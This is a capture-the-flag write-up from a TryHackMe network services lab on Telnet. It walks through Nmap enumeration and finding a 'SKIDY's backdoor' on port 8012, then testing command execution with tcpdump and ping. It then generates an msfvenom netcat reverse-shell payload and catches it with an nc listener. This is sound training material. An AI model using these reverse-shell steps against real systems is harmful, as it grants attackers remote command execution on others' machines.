THM – Network Services – Telnet – Part 5

Understanding telnet 

What is telnet? 

Telnet is an application protocol which allows you, with the use of telnet client, to connect to and execute commands on a remote machine that’s hosting a telnet server.  

The telnet client will establish a connection with the server. The client will then become a virtual terminal – allow you to interact with the remote host.


Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.  

How does Telnet work?  

The user connects to the server by using the Telnet protocol, which means entering “telnet” into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the follow syntax:

Telnet IP PORT 

The lack of what, means that all Telnet communication is in plaintext? Encryption 

Enumerating Telnet 

Use Nmap to scan for open ports and services on the target machine.

How many ports open on the machine? One 

What port is that? 8012 Telnet is assigned to a non-standard port.  

Based on the title returned to us, what do we think this port could be used for? A backdoor (SKIDY’s BACKDOOR) 

Who could it belong to? Skidy 

Exploiting telnet 

Telnet, being a protocol, is in and of itself insecure for its lack of encryption. It sends all communication over plaintext and has poor access control. There are CVE’s for Telnet client and server systems. A CVE, short for common vulnerability and exposures, is a list of public disclosed computer security flaws.  

You are far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow us to exploit it.  

Method breakdown 

From our enumeration we know: 

  • There is a poorly hidden telnet service running on the machine. 
  • The service itself is marked “backdoor.” 
  • We have possible username of “SKDY” implicated. 

Connecting to telnet 

Connect to telnet using the command telnet IP PORT

What is a reverse shell? 

A “shell” can simply be described as a piece of code or program which can be used to gain code or command execution on a device.  

A reverse shell is a type of shell in which the target machine communcates back to the attacking machine.  

The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.  

Connect to this telnet port. What welcome message do we receive? SKIDY’s backdoor 

When executing commands, do we get a return on any input into the telnet session? No 

Let’s check to see if what we’re typing is being executed as a system command. 

Start a tcpdump listener on your local machine.  

sudo tcpdump ip proto \\icmp -i eth0 

Use command ping local THM ip –c 1. Do we receive any pings? YES

This means we’re able to execute system commands AND that we are able to reach our local machine.  

We’re going to generate a reverse shell payload using msfvenom. This will generate and encode netcat reverse shell for us. Syntax: 

msfvenom -p cmd/unix/reverse_netcat lhost=local_IP lport=4444 R

-p = payload 

lhost = our local host ip  

lport = the port to listen on (this is the port on your machine) 

R= export the payload in raw format

Payload is generated. Now start a netcat listener on our local machine. We use this command:

nc -lvp 4444

Now that’s running, copy and paste our msfvenom payload into the telnet session and run it as a command.  

Catch the flag!

Similar Posts